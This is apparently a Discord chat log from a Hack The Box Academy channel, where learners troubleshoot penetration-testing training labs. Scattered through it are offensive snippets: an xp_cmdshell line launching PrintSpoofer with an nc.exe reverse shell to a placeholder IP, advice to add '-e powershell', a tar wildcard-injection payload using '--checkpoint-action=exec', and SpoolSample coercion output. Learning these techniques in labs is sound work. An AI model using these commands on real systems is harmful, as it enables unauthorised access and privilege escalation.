#modules
That didn't work.. will check another way
I mean you can manually type it lol
well, i was looking for a shortcut for future use
Looks like there's a tool https://www.whiteoaksecurity.com/blog/burp-suite-macros-reshaper-guide/
Attacking GraphQL will be replacing Session Security, huh..
hmmm.. thank u 🫡
i've experienced this only two times. every other question was fair
it's not consistent, it's only been a few times
if you are having trouble, you might have to reread the section/module again and perhaps do some additional research to fill in the gaps
Yes, that surprises me too
tbh session security wasn't the best module
I am expecting a big change on CBBH
a lot of new modules
i'm wondering how they're going to teach CSRF now since Session Security was the module that introduced it
CWEE has Advanced XSS & CSRF Exploitation so it has to be taught in some module
maybe they will introduce it in another module
maybe they will add it to xss module
After crawling the inlanefreight.htb domain on the target system, what is the email address you have found? Respond with the full email, e.g., mail@inlanefreight.htb.
What is the API key the inlanefreight.htb developers will be changing to?
i need help with these questions from Skills Assessment Information Gathering - Web Edition cbbh
Did you ReconSpider?
it tells me the IPstack API key was not found
how can i do it?
git clone https://github.com/thewhiteh4t/FinalRecon.git | this one ? i did download that but having the same issue
That's not the right one
https://academy.hackthebox.com/module/144/section/3079 this is the page that has the link and instructions
ok thanks
How do I make this bigger
Click the fullscreen button in academy
But fr just drag it
It is fullscreen and I tried to drag it all I can
Where the 3 dots are
Drag that up
If that's as big as it gets you need a bigger screen or window
Yup but shi... doesn't get bigger
command+q
That’ll just close it
In the current Broken Authentication assessment, a fuzzed user was found, but the password was not found using the same wordlist (10 million used in the module). It seems that another wordlist may need to be used. Any help, please?
The module shows you techniques on how to create password lists.
Do you mean I have to create a word list or customize it with grep?
https://academy.hackthebox.com/module/110/section/1056
How am I supposed to change the cookie when it's not a part of the request but only response?
I tried manually inserting Set-Cookie in the request, but didn't seem to do it.
If the server responds with a Set-Cookie: name=value, your next request should contain the header Cookie: name=value
i have a problem: i am scanning using the IP address mentioned in the module but nmap tells me the host is not available??
check ur vpn
ok
i have a stupid question: if the question is to find the flag on the desktop of user SQL01 (i am on skills assessment 2 in the AD module)
how can i know the ip of SQL01
ipconfig ?
nxc ?
ok let's say i got the range 1.1.1.0/24 and i nmap scanned it and found 3 ips, which is for who?
and what if there are like 50 users in the AD
i know it's a stupid question, or i am kinda brain fried here
if you are reading AD enumeration and attack and you can't find this out, you may need to take a step back
lol
it's literally learning, it's called ACADEMY
Well if you have a foothold on one of the windows machines, often you can ping <hostname>
He's meaning you're missing something more fundamental my guy
yeah but there are some prerequisites to learning things
Nothing to do with it being academy, but pings, hell, nmap scans with -sCV may reveal hostnames
I believe the second assessment gives you a parrot foothold that's sitting in the network
@distant island https://academy.hackthebox.com/module/details/143 read this to understand why I told you that
Best to specify; "a firm grasp of the following..."
yeah exactly this part
Otherwise it looks like you're linking him to the module he's doing 😉
Oi no spoilers
Also I'm assuming you added -Pn to the scan
-sn ?
YES
why ?
to see the open IPs
Well -sn won't run port scans, and you said you found 3 ips, put those in a list
i don't want a port scan, i think y'all didn't get the question i am asking
Are you sure you're using the right exploit
you can use nxc, it's way better in AD envs, and it gives handy info
You're not understanding the breadth of what I'm saying
You have ips
You can utilize port scanning to discern which hosts are which
Such as -p 3306
For mssql
Or 1433/1444
Again basic service enumeration can go a long way
yes i got what u r saying, but is this the only method? cause if i am in a big env with like a huge number of ips it will be super hard
Dude
Don't overthink this
You're literally hindering yourself because you're overthinking
You have a small environment so don't think too hard

What ifs are fine and all; but you're not in the what if
You're in a specific scenario
Hey, so I'm currently super stuck on the Attacking Authentication Mechanisms module during the SAML Signature Wrapping Attack. Anyone i can dm for advice on my XML payload, cause for some reason it is not working...
Also the key bit of the "a firm grasp of the following..." is the pivoting module
Hi
is it possible that bloodhound doesnt show all the permissions a user or group has over other users and groups?
Sometimes yeah
And you'll need to run another collection
is that because the user that ran sharphound doesn't have read rights over that user's/group's ACLs?
Bloodhound collects data with the user privileges u have now, so if u are a normal user the collected data will be different from if you are local admin and collect data
And so on
This is why it's also advisable to recollect data if you managed to escalate privileges or pwned a higher value user in the domain
how to delete zombie files
i tried 3 diff wordlists, none of them work, what should i do
What is the FQDN of the host where the last octet ends with "x.x.x.203"?
module:/Footprinting/DNS
Are we not allowed to type the answer on the tasks anymore? Now it's a “show answer”, sup with that?
anyone done Attacking Authentication Mechanisms - SAML Signature Wrapping Attack here?
It appears like the flag for Injection Attacks in the brand new Attacking GraphQL module is not working.
anyone else have this problem?
@steady dock has been typing for ages
It just makes a bunch of ldap queries my guy, very little to do with your current user, as long as your user is a domain user
The missing info is just a query that didn't return in time
why wasn't this removed?
Often you may find info sharphound/bloodhound misses and vice versa
Because the user didn't delete their message
Hi everyone,
I'm working on the Injection Attacks Skills Assessment. I managed to find ||xpath injection|| on the internal app. However, when I dump the data, I'm unable to fully display the output. When I try to get each element at a time, I'm not succeeding. If anyone could provide a small nudge, I would appreciate it.
Don't forget to url encode every character of the payload
DM me
hi I am literally following along with the section that seems to want me to follow along. the section is the Attacking SAM section of the Password Attacks module. I am doing the exact command it says to do and it won't let me do the command on Windows, and it can't find the share even when I specify a network share I just created on Linux.
I don't want to share actual content publicly because I know that's not allowed in Tier 1.
anyways, can someone help me out here?
Did you run your cmd as administrator
yes
cmd is run as admin. I can close and open it again but I'm 100% sure it is being run as admin
in fact it even says "Administrator" at the top of the cmd prompt
brb
You try to run reg.exe, right?
Do you find yourself in the System32 directory? To dump the file into their respective directories
Hello all.
I'm just starting out on HTB academy, Linux essentials, and I'm trying to figure out the questions at the bottom but with some of them I feel so lost, like I'm missing a piece of the training I should have read or should know already, but I was recommended this by HTB as the one to start off with. I'm unsure if this is the right place to say this or even if I'm wrong. It feels like I'm tier -1 and I'm so lost. If anyone could dm me and give me tips on what modules I should do first?
hi I think I may have solved the problem
And mv the result to C:\, or I imagine that's where your share is
```
c:\>move sam.save \\10.10.14.143\CompData
Access is denied.
        0 file(s) moved.
```
I had to change the IP address
but it still denies access to move it to Linux
move sam.save \\ip\compData worked for me, did you run smbserver with sudo?
the problem is the folder didn't exist that I was looking to transfer to
I did run it with server but had to modify which Linux user I was transferring it to
now its fixed
Okok yes I forgot to ask if the directory existed
i'm stuck on module 18 section 78, I'm trying to find the name of the last modified file in /var/backups but I can't figure it out.
i've tried ls -it and looking through the directory's files but I still can't find it
can someone give me a hint?
Are you ssh'd into the target?
@fathom pendant do you know if I rdp from the bob's windows machine or do I do it from my machine to trigger event 4771?
Okay I tried this I will reset the target Ip and try again
how can i get email address from IMAP/POP3 ?
You ask it nicely
But imap and pop3 have different syntaxes
<literally anything> command <args> is the basic imap structure
can i use printspoofer or rogue potatoes without metasploit
Yes
They exist as standalone portable executables you can download
At least printspoofer does
i tried it with nc.exe but it gives me a normal user, not NT AUTHORITY
Running a command using printspoofer?
NC isn't a privesc tool. It'll execute under the user context of whomever launched it
||xp_cmdshell c:\users\Public\PrintSpoofer.exe -c "c:\users\Public\nc.exe <ip> <port>"||
this returns as a normal user but it helps with escaping the sql
how can i execute printspoofer the right way
for priv escalation
why not just run it again from the reverse shell
should i try a normal shell from revshell.com cause i don't want to use msfvenom ones or metasploit
@fathom pendant am I doing something wrong? sorry the chat is overloading on you but I tried again and 4771 doesn't appear anywhere
Thank you so much
i didnt know about the print spoofer exploit then, so i just ran a base64 powershell reverse shell
No idea dude and I'm not loading up the module to sanity check
i will double check again
Oh with nc for windows don't forget to do -e powershell
Or -e cmd
So it can actually execute stuff somewhat properly
🫡
it worked without metasploit after executing the normal nc.exe shell, then executing printspoofer with a rev shell
¯\_(ツ)_/¯
( -_•)▄︻テحكـ━一❤️
Htb cbbh is great
or web
What is cbbh
Check in htb academy bug bounty path
Under job role path
i’ll have a look
i have my ceh exam tomorrow
thanks my men
SOEMON
That's not a rule break, that's a defend bro
Also ur kinda right bc
Hello,
I'm doing the Footprinting Skills Assessment "Easy" but I'm currently stuck
So I started by performing an nmap and found 4 interesting ports.
For both FTP ports I can login using the credentials provided but I can't do any enumeration. Each time I use ls or any other command I have the following message (see screenshot).
For the DNS enumeration I found several subdomains & IPs but nothing helping me to retrieve the flag.txt.
PS : I managed to retrieve the files using wget but I still don't understand why using ftp command I couldn't retrieve anything.
anyone got a way for fixing this problem whenever i boot my kali linux up?
using a VM for it
use a better hypervisor like vmware workstation pro (it's free now) or change your graphics controller to vboxsvga in settings
vmware better than virtualbox?
i've been using virtualbox my whole life
ok then change the graphics controller
for me and a lot of others, yes
will switch over tomorrow morning
it says right there what your error is
done but it claims an error
'vmwgfx seems to be running on an unsupported hypervisor'
ah
yes
so i am on the last part of skills assessment 2 in htb, i finished everything but i am only stuck here, can't login to the user
AD module in CPTS
what's the actual thing you're stuck on unless you literally mean you can't log in.. in which case what's the error
i literally got everything and i know how to control the domain after becoming this user, and i have the user's password
but can't login as him
that's a lot of words with no real substance as to your actual issue
if you have domain admin, you can do whatever you want, including log in
i have this user's credentials, i should now login to DC01 but i can't
is your keyboard plugged in?
Is the user actually domain admin tho?
"i can't log in" isn't describing the problem in any way that anyone can help you
you can't log in.. to what? with what app? what syntax? etc
you're saying absolutely nothing about your actual problem
iirc having rights over something does necessarily mean ur in a group
bruh you are giving away way too much of the module
it's already in the question shown, i didn't spoil anything
😭
it is, you spoiled the username
i know
and how to abuse it etc
Have u thought about adding ur self first?
i marked it as a spoiler
sorry i am kinda brain fried ngl
yes this is exactly what i want
but dont know how
Powershell?
he said his problem was that he couldn't log in
yes i literally couldn't name the problem, i think my brain is kinda lagging from 10 hours of solving labs
if u don't mind can u explain this part
can i dm u cause i don't want to spoil things
Ye
Module: Linux Privilege Escalation
Section: PATH Abuse
Link to section: https://academy.hackthebox.com/module/51/section/472
Just finished this section. What I don't get is why is it necessary to go through all this trouble of adding it to the PATH if we could just run a script directly?
Learning things manually will help cause in the real world av and edr are a pain and sometimes u can't run scripts
Can't run scripts? So you're saying there'll be instances where I can create a script, give it executable permissions, but can't run it directly cuz of av and edr. So, calling the script via the PATH somehow helps with bypassing av/edr?
In some instances u will not be able to run scripts at all or even create and save ones
no, this is privesc, not evasion
Module: Linux Privilege Escalation
Section: Wildcard Abuse
Link to section: https://academy.hackthebox.com/module/51/section/473
In order for this to work, the cron job should be running with root privileges, right?
Also, I'm assuming that the wildcard character * goes alphabetically? Since it'll take the checkpoint arguments first?
So... what how does PATH abuse help then?
there might be something that runs as root and executes a certain binary
if u edit the path it will run urs first
hello everyone, I'm new to htb, how do the modules work in htb academy? I would like to do the cpts module path, does it have a limited time for access? sorry for repeating this question as I'm not sure where to ask
Like a cron job?
any binary like TLattice said
In the Windows Evasion Techniques module, is there supposed to be an IDE installed to compile programs?
Or do I need to compile everything on my machine and then move it over?
Got it, but it'll most likely be from a cron job, yeah? I'm asking cuz you need to figure out which binary to choose when doing the PATH abuse.
No. This has nothing to do with cron jobs. A cron job is a scheduled task, that's it. A cron job itself isn't a binary.
you could use it to run whatever command you want
Yeah, I understand it has nothing to do with cron jobs, but it's not like anyone can execute a script that runs as root, right?
Nvm, I just realized as long as permissions are there, it can be done, my bad.
i think cronjobs have the path as the user running it
so yeah, it won't run through ur path
Ouhhh, wait, then won't that be the case for any script that uses a binary as well?
No because you might have permissions to execute a file. But within that file it executes commands with root privileges or you might have the power to run the binary with sudo
yeah, u need to be able to execute it
They give you a VM in one of the first sections that has development tools.
If you don't want to install tools locally, you'll have to bounce between firing up the VMs in each section, and the original development VM.
honestly i used my own comp because it was slow a f
Ahh okay, no I'll just set it up locally and map the drive
Yeah makes sense
Ahh, I see.
If you get stuck in the module, you can DM me. It has some rather confusing layout.
Okay thank you, you'll probably find I will
Can someone explain to me how the * wildcard in the example in the section takes file names as command arguments but not as literal file names? Won't it throw an error when it tries to process tar -zcf /home/htb-student/backup.tar.gz --checkpoint=1 since there's no file specified?
what?
I'm trying to understand how the * works here.
Does it list every single file name in that one command?
* is a wildcard for any character and any number of characters
So if I have a directory with the following files:
--checkpoint=1
--checkpoint-action=exec=sh root.sh
somerandomfile.txt
root.sh
When it processes the *, it'll basically run:
tar -zcf /home/htb-student/backup.tar.gz --checkpoint=1 --checkpoint-action=exec=sh root.sh somerandomfile.txt root.sh
Separately? So like this?
tar -zcf /home/htb-student/backup.tar.gz --checkpoint=1
tar -zcf /home/htb-student/backup.tar.gz --checkpoint-action=exec=sh root.sh
tar -zcf /home/htb-student/backup.tar.gz somerandomfile.txt
tar -zcf /home/htb-student/backup.tar.gz root.sh
the file names are arguments for the tar command. it only executes the thing you have after exec=
yeah like that
Won't some of those individual commands throw errors though?
Like I'd expect the first command to throw an error and maybe even the second.
I'm confused as to how that works, still don't understand how it processes the * wildcard.
i was wondering, is there any nse script which will tell the contents of the robots.txt file? i have seen many times that it displays the content of that file. i used the -sC default script option
* is just a wildcard in linux itself. if you have file1.txt file2.txt file313137.txt, you can type "rm file*.txt" and it will delete all three files. if you typed "rm file?.txt" it would only delete file1.txt and file2.txt, because the ? is a wildcard for only one character while the * is a wildcard for any character and any number of characters.
that's all it is, a wildcard that can replace characters
Yeah, I understand how that works, I just am trying to understand how the final command when it's processing looks.
Because the command being repeated like this doesn't sound right.
essentially you're telling tar to backup all the files, but you hijack the command with filenames that act as arguments to the tar command
tar -zcf /home/htb-student/backup.tar.gz --checkpoint=1 --checkpoint-action=exec=sh root.sh somerandomfile.txt root.sh this is correct
you're telling tar to backup all the files in that directory, but because the filenames are also tar arguments it triggers that action from tar, in this case an action is executing your script
Chatgpt can also explain some topics in your preference too @normal sand
Ahh, thanks, that's what I wanted to know. Just saw it in the article you sent as well.
Thanks for the tip. I tend to forget sometimes 😅
Btw follow up question, I already tried asking GPT, but it didn't really provide an explanation. In the man page for tar, it states the following:
--checkpoint-action=ACTION
Run ACTION on each checkpoint.
In our command, we use the exec action but I didn't find this to be specified anywhere in the man page. And when I asked GPT, it just said that it's not mentioned in the man page but it's well-known.
So, if I wanted to perform wildcard abuse like this but on another binary, I'll just have to Google and see if the other binary has got some sort of execution parameter since it may not be specified in the man page?
can someone help me? I'm trying to solve the question "Within the "webfuzzing_hidden_path" path on the target system (ie http://IP:PORT/webfuzzing_hidden_path/), fuzz for folders and then files to find the flag." in the Directory and File Fuzzing module and whatever I do I can't find the hidden path?
I tried finding hidden 301 pages the only one that comes up are w2ksvrus and any HTML page I open up says this is a example page
for pivoting skill assessment, am i supposed to be able to rdp to the last dc?
thinking that rdp is fried rn
if someone configured a firewall to respond with an rst flag, nmap will consider it closed even if the port is actually open, so how can we determine the state here?
netexec indicated user Johanna cannot rdp
but i am able to rdp using xfreerdp
can anyone clear my confusion here.
i wasn't able to rdp anywhere but still completed it
@normal sand I am also doing CPTS path and I had noticed that we were both doing "Password Attacks" module at some point in time. Now, you are way ahead of me. I just wanted to know your timeline. If you don't mind, can I dm you?
I solved the last flag. But I couldn't RDP. The other machines were ok.
if you try local-auth does it work?
doesn't look like it's domain joined
got it, now working as expected
im here to rant. why are remote rdp machines so slow? registering a click takes 10 seconds.
Hey how do i install httpx on windows
pip install httpx
https://www.python-httpx.org/
Kk thanks
If it helps, I get better responses when using pwnbox than connecting from the vpn
anyone finish the footprinting module
i need hint
for the Skills Assessment?
no, DNS
need more details
for what question
- 1 What is the FQDN of the host where the last octet ends with "x.x.x.203"?
i tried all subdomains
how can i use dnsenum for sub-subdomains
monthly subscriptions, except the student subscription, only give cubes
i was using the student sub before which gave access till tier 2, i thought the gold one would give the same exp but with 500 cubes, but it seems it only gives cubes
Only the annual subscription gives access to the modules.
The monthly subscriptions give you cubes so that you can unlock modules
ok
did you use dig axfr already?
that should initially have given you a subdomain
Hey, sure. You can DM me but idk when you saw me doing the Password Attacks module. It's been a long time since I completed that.
Also write the section and module name...
Hey I have a question about the SQL module. Can someone explain why one is wrong and the other is right. I find it very contradicting
notAdmin does not exist so it fails the login attempt
what about the OR part, does it not consider it
it returns a true
python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py <USERNAME>@<TARGET IP> -windows-auth try this might work
guys, i have 1000 coins and wanted to open the modules based on web security, i have secure js 101 in mind, or advanced xss/csrf, Modern Web Exploitation Techniques, which one should i try first
JS cost 1000 and other two combined cost 1000
not working
Dm
done
1- What is the API key the inlanefreight.htb developers will be changing to?
[ creepy crawling ]
2- After spidering inlanefreight.com, identify the location where future reports will be stored. Respond with the full domain, e.g., files.inlanefreight.com
[Skills Assessment]
what is the answer for these questions from ( information gathering web edition )
please can someone help with attacking session cookies
I think you're right, this looks like a typo.
you can fire up sqlite and play around with it, that helps me at least
I'm trying to find that section to take a look. The only question I might have is the stacked username = '...' or '1'='1' and password='something'... it can depend on how those and/or statements are evaluated. I didn't add password in my example above.
What have you tried? What exactly is not working?
Can anyone help me with the smb-os-discovery nmap script? I'm trying to use it but it shows me just the port, not the script output
Same output
sudo nmap --script smb-os-discovery.nse -p445 IP -sC -Pn -v
what module / section is this from
can you list the shares with smbclient?
Yes I can
I tried to use other nmap scripts such as enum user and those too aren't working out for me, but in msfconsole the auxiliary modules are working fine for me
not sure then, i don't have notes on the module so can't verify what i did
your command looks correct tho
if the script files are properly installed and placed where they're supposed to be it should work
They are at /usr/share/nmap/scripts/
don't specify the port and try again
also probably run it as root
Anyone who managed to pass the check on the last question of the Active Directory BloodHound skills assessment?
Seems like no number works :/
that question is kinda cooked
Did everything still no lead
it's 4/13
Check https://hausec.com/2019/09/09/bloodhound-cypher-cheatsheet/
Then you just have to convert the query to Azure
iirc the answer is just wrong
some users didn't get counted
I know there are 13 users in total and yeah 4 should be the users that have a path to global admins which should give 30.77 but it is still not working
don't round up
no clue, for smb there are other better tools anyways
OMG! That was the issue, LOL. Lost whole morning when I had the answer in my hands
No, the answer is correct. But you are not allowed to round
Hello
Is there a phishing module?
No like email phishing with gophish and stuff
Please name them if you can
I am tasked to figure out why our phishing campaign is going to spam folder and to propose solutions
Sounds like a work thing not an academy thing
Because your company has done its homework and implemented appropriate measures to classify emails.
^
Well I don't know much about it I just need somewhere to get started I figured if there were a module for it it'll be a decent starting point
No, there is no module about it.
But as I said, your company has done its homework and configured the mail server correctly.
Not sure what you mean?
Hello guys! Anyone know good resources for SELinux, AppArmor and TCP Wrappers?? I'm on “Linux Fundamentals”
Thanks
Oh gosh I went down this rabbit hole, let me check if i saved any of the links
Thanks 🙏
For SEL these were the two best resources I found. One of course is the fedora stuff... the other is a walkthru. I'm sure there's others but this got me familiarized pretty good.
https://docs.fedoraproject.org/en-US/quick-docs/selinux-changing-states-and-modes/
Uh no like I mean we do phishing campaigns to other companies as part of the specifications of certain audits, this could still help though as we might start asking clients to whitelist us or something, or to configure things in a certain way, thank you.
Btw you don't need to do this
Hello,
I'm currently doing the Footprinting Skills Assessment - Hard.
So I started with an nmap with -sC -sV on all ports and found that ports linked to IMAP/POP3 and the ssh port are open.
I tried to apply what I learned in the module but without any creds I couldn't get any useful information. I also tried to do some brute force without any success.
Those are 100% optional
@rustic sage I recall app armor being significantly easier to config, not that either of them were hard, just tedious, and i did it while house sitting for a friend so i don't have links in my notes or browser history, but here's one i did browse beforehand.
https://computingforgeeks.com/apparmor-cheat-sheet-for-linux-system-administrators/
Did you scan udp?
No I didn't ! I will do it right now
Thank you so much 🙏🙏🙏
ah, i had my notes partitioned here, this is the exact apparmor primer i followed. https://www.howtogeek.com/118222/htg-explains-what-apparmor-is-and-how-it-secures-your-ubuntu-system/
Really? Is not important?
It's not essential to the module, but it's no less important
Thank you 🙏
¯\_(ツ)_/¯
it seems i skipped tcp wrappers, if you find a primer that you find enjoyable and wouldn't mind sharing i'd be appreciative. i think i have just the tcp wrapper notes from the module, haven't "done" it though.
👍
Have fun
Thanks 😊
Good afternoon
I have gone into /etc/hosts.
10.129.201.90 gitlab.inlanefreight.local
10.129.201.90 inlanefreight.local
The thing is, I have to find more subdomains. I run a ffuf
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt:FUZZ -u http://FUZZ.inlanefreight.local
And it does NOT find subdomains.
If I incorporate the subdomain in /etc/hosts.
10.129.201.90 gitlab.inlanefreight.local
10.129.201.90 inlanefreight.local
10.129.201.90 blog.inlanefreight.local
It does find it, launching exactly the same command with the same dictionary
blog [Status: 200, Size: 50120, Words: 16140, Lines: 1015, Duration: 892ms]
gitlab [Status: 301, Size: 339, Words: 20, Lines: 10, Duration: 7ms]
Does anyone know what's going on here? Shouldn't it find it even if it doesn't have an entry in hosts?
You need to fuzz the host header
What you're looking for is probably a vhost, not a subdomain. So add the host header like Marcie suggested.
While normally used interchangeably, when fuzzing it does matter
What your current fuzz command is doing is trying to fuzz using public dns
Can anyone help me with some smb tools for my query?
And asking public dns "hey do you know where x.inlanefreight.local is"
@rustic sage this was my experience, i hope yours is less frustrating. spin up a vm that has SEL installed out of the box, and ubuntu for apparmor, should take a very small amount of hassle out of it
All the tools you need are in the reading
@fathom pendant and @normal sand BINGO! thx a lot!
My query is this @fathom pendant
Ok?
There's also multiple ports tied to smb btw, not just the one
I believe the reading goes over this
And it goes beyond scanning
I tried every smb port listed on the nmap full port scan yet no lead
what are you trying to find?
The OS
Then it doesn't have to be done via that script, right? How about running an aggressive scan or OS fingerprinting?
Everything you need is provided by the section. Beyond just scanning
I tried -O as well as -A but no lead
Man I can't see what you're seeing
This is the footprinting module yeah?
Idk which module you're at but you could try running all the smb scripts with something like --script smb* I think?
I didn't see where you clarified the module you're working on
I used every nmap script mate even enumuser too but it doesn't post any script output
@green musk do you need the exact OS or just a is this windows/linux? you can check the TTLs 64 = linux 128 = windows. this can give a rough estimate.
This section doesn't ask about OS
huh where in the section did they ask you to find the os version
Service scanning nmap script
The examples won't always match what you get
But none of the questions ask about OS version
Then how could I try to find the OS it's running as? Without the script too I can't get any output, my command is
sudo nmap -sC -sV -p- IP -O -A
You're heavily overthinking it
Also your image was removed bc it didn't embed
Yep the scan discovered the os btw
Whatever file format its being saved as isn't supported by discord embed btw
It's okay for the Pic right now but I don't know why my nmap scripts doesn't show me any outputs
Yes I can see that but when I'm trying to input that same command on my kali instance it doesn't show me host script results:
I answered all the questions man but I want to understand why I'm facing this issue
Just ignore it and move on
The only thing I could maybe say is reinstall nmap or make sure it's updated
I thought here someone could explain to me why I'm not getting the output I desire
¯\_(ツ)_/¯
Lemme do that
sudo nmap ?
there are instances where you need to run it as sudo, can't remember the specific scenario(s) at the moment, worth a shot
chatgpt suggests OS Detection might be one scenario, though they suggest a diff cmd for this, Example Command: sudo nmap -O -sV <target>
take that with a grain of salt.
That's shown btw in the module
right on
At least I think
At least -A is
Which does a whole lot of nmap commands wrapped into it
Does everyone have a connection to their machines?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
I am happy you are 
Hello, I'm new here. I have just completed my degree in computer systems security. I was very keen to develop my skills in this area and I am open to your suggestions on how to become an ethical hacker.
@fathom pendant I want a plan to be competent in IT security
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Hi. I'm trying to open the vpn of the academy in the linux terminal with "sudo openvpn academy-regular.ovpn" but there is an error "Options error: In [CMD-LINE]:1: Error opening configuration file: academy-regular.ovpn". What is happening?
It means the file isn't in your current directory
If it's in your Downloads folder you'll have to cd Downloads
Then run
it's on the desktop
Then you'll need to cd ~/Desktop
When you open a terminal it defaults to home
/home/<your username>
Which is what ~ is usually aliased as
Only once per session, not every single time
You can do as many modules as you want with that one connection
"TRX leaves his mark", Can anyone give me a clue? FullHouse Machine
what do i have to do to connect to a htb vm? the command says error connecting to that ip
The authenticity of host '10.129.105.95 (10.129.105.95)' can't be established.
ED25519 key fingerprint is SHA256:PHsjpBEAl6hSCzjVohppUybupbLXdBZy8FqtwlMpmjU.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])?
yes
just type yes
gives an error
ok
Hey I'm doing the attacking thick client applications section, I try to change permissions of the temp folder but I can't understand how to do it by reading what's written in this module, could anyone help me out
It's a windows basics thing
Disable inheritance--> remove your user from having delete access
What is the path to the htb-student's mail?
Which shell is specified for the htb-student user?
I don't know how to resolve those 2 questions with the info in the linux fundamentals module.
Maybe it's because I don't understand the question, English is not my native language
env command
A lot of the required tools are given
Ok i will search info about that command
Literally just run it
ye i see but idk why it shows that info haha
ok
hey i was solving the firewall evasion lab and when refreshing the status page of alerts of the target it is automatically increasing and i haven't even started scanning. is it because different users are on the same subnet and scanning the same target
No
Labs are independent
It's just like that
I wouldn't worry too much about the status thing
well obviously it's going to increase every time you refresh the page, you are basically sending a request to the webserver which is being logged
in that particular section there was a graphic which explicitly mentioned contains user mail
if i refresh the page it should increase by one but it is increasing like 80 to 85
dw about it too much, perhaps there are more calls being made check the networking console
just carry on with your lab
I ignored the status page entirely
Only if the box stops responding you should check
Hello guys, when accessing the labs in the module "API Attacks" the target fails to come up and the status continuously reads "Target is spawning". Can anybody assist me.
https://academy.hackthebox.com/module/51/section/1640 Python Library Hijacking
What am I doing wrong?
You can't modify the path, so just move on
the file psutil.py needs to be created in tmp or /usr/lib/python3.8
No it doesn't
You can edit the library it's calling directly
is it the terminal where i start the vpn all the time "typing"?
It doesn't work or I don't understand something
You don't run it with sudo
Or at least not that I remember
Linux privesc module yeah?
yep
Oh
It's because you're doing ./
Do the full filepath
The way to interpret the sudo command is that it's explicitly stating a path
You might get away with dropping the ./
#modules I'm stuck in kerberos attacks unconstrained delegation - computers part .
C:\Tools>.\SpoolSample.exe dc01.inlanefreight.local sql01.inlanefreight.local
[+] Converted DLL to shellcode
[+] Executing RDI
[+] Calling exported function
TargetServer: \\dc01.inlanefreight.local, CaptureServer: \\sql01.inlanefreight.local
I ran multiple times but not able to capture the dc01 hash on rubeus. what is going wrong.
im trying to connect with ssh to the hb vm. When i connect it says Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings.
Before i could connect, idk what happens now
whats your terminal cmd for ssh'ing minus the password of course
Okay, I don't know why there are hints in the module. If i still had to decide on my own.
The part with setting the env shows explicitly what needs to be there
SETENV <
i dont understand you
now i think im in but its too slow i cant type
ssh: connect to host 10.129.245.60 port 22: No route to host
I have that problem
check your vpn connection
they are all medium load. Maybe that is the problem?
try to ping 10.129.245.60
its what im pinging
no one can help you without knowing what exactly the problem is, if you can ping the IP, then check if there's an ssh open
I don't know man, I'm new. I just try to connect to a htb vm using ssh htb-student@[ServerIP] and that error appears
I tried with different IPs, refreshing them
What error appears?
ssh: connect to host 10.129.245.60 port 22: No route to host
Nvm I scrolled up
Connect to vpn
If you changed vpn regions you need a new download
But?
If you change vpn region you need to use a new file
Otherwise you're not gonna connect
can you run ifconfig
and send us the output
it's hard to help without knowing what's the problem
it worked now. I just regenerated everything after deleting with "sudo killall openvpn"
so something was wrong with VPN
Do I need to know everything that's taught in linux fundamentals? For example in backup and restore I didn't quite understand the encryption that well, so is just a basic understanding good or do I need to understand everything fully?
for what?
no
I'm pretty sure asking for answers is against the rules
its ok im done with it ^^
Just a basic understanding of tools is enough
How many possible values are there for a 6-digit OTP? I am putting 10,000 as the answer as that is all I can see. Please can someone point me in the right direction
thats 5 digits
Also 100000 wouldn't be right
1000000 would be correct
Consider all digits are 9s
On what do password recovery functionalities provided by web applications typically rely to allow users to recover their accounts?
please can you help me with this question too ?
and thank you for your help with the previous question
I thought it was a one time reset token
Check the reading
I suggest fully reading the material before just seeking answers
Ok cool ill give it another read
the password attacks module is very heavy, especially the active directory section, i spent 4 days and didn't finish it yet 💀
bump
the exact next message sent in this channel tells you the answer
Thanks!
Sorry my bad I didn't see it!
Hello, I want to ask for some tips on Directory Listing in Hacking WordPress. When I do it I navigate through all the files and folders manually, so I want to know if there is a way to automate the process
you can use wpscan
I tried it but don't know which switch
I don't think you need a special switch
if i wanted to use the pwnbox, is there an easy way to download files related to the module?
right-click > copy link > wget <paste>
the pwnbox got internet ?
yes
yeah that wont work :9
it will work LMFAO
i've done it
maybe ur magic
ah is this a download from right next to the question?
yes, thats what i meant as the challenge files
yeah any call to https://academy.hackthebox.com/* requires your htb_academy_session cookie
so is there any easy way to download the files, or am i going to stop using pwnbox
a lot of the stuff is stored on like storage.hackethebox.com/
if you open the browser dev tools and go to the application tab (on Chrome) or Storage (on firefox iirc) and click cookies you can find the "htb_academy_session" cookie
can't you use curl with cookies and output the downloaded file?
that's literally all it needs for that
since it's not calling to the storage server for whatever reason
alright
i mean you can also use the network tab to see if it's calling out to that instead
¯\_(ツ)_/¯
i am going to use a vm
but thanks for the ideas, i was hoping for a simpler solution
i just wanted to try something out quickly
yeah this is one of those few cases that because it's in the module instead of a resources bucket
sorry to be more specific it's not calling academy.hackthebox.com/storage
which doesn't require any authentication to pull
@jaunty vigil the footprinting one (as an example)
since it's from the resources directories bucket it doesn't actually require authentication
that's ffuf being ffuf
but also somewhat spoilery
make sure you're also filtering for the right size, if you changed the size of the terminal that's running ffuf it'll do that
look for the common size returned if you're getting multiple positives
and use that as your response size to filter against
-fs
the examples don't always match up to what you're testing
Has anyone here used sysreptor for reporting on the exam? If so, did you find an easy way to export the report as plain markdown?
the size that i filter is already correct
did you make the screen bigger after starting the command?
no
try opening a new terminal, maximize it, and run ffuf in that
ffuf is dumb like that sometimes
also your size doesn't look correct if you're getting a bunch of 200s
use the common size returned by all those 200s
SIZE: 7..
or words?
the correct one will return something that is not 7..
i tried running the command again in fullscreen and then i got the new output
that's not always a valid way to filter
it always depends
🤔 it managed to help me but I will keep that in mind
again it depends
true
do you know what words will and won't be on the returned outputs
bearing in mind ffuf looks at the html code
not really. but server response is definite for a non existent subdomain
if im correct
this isn't about a subdomain
it's filtering for a parameter value
I understand
so it has nothing to do with a non-existent subdomain
there may be a word to filter by, if the bad parameter value elicits that response
it all depends how it's coded
got it 🤔
they aren't fuzzing for fuzz.htb they are fuzzing for 'param=FUZZ'
so nothing to do with subdomain/vhost
your line of thinking isn't entirely incorrect
just needed to be worded better to be able to expand into broader thinking
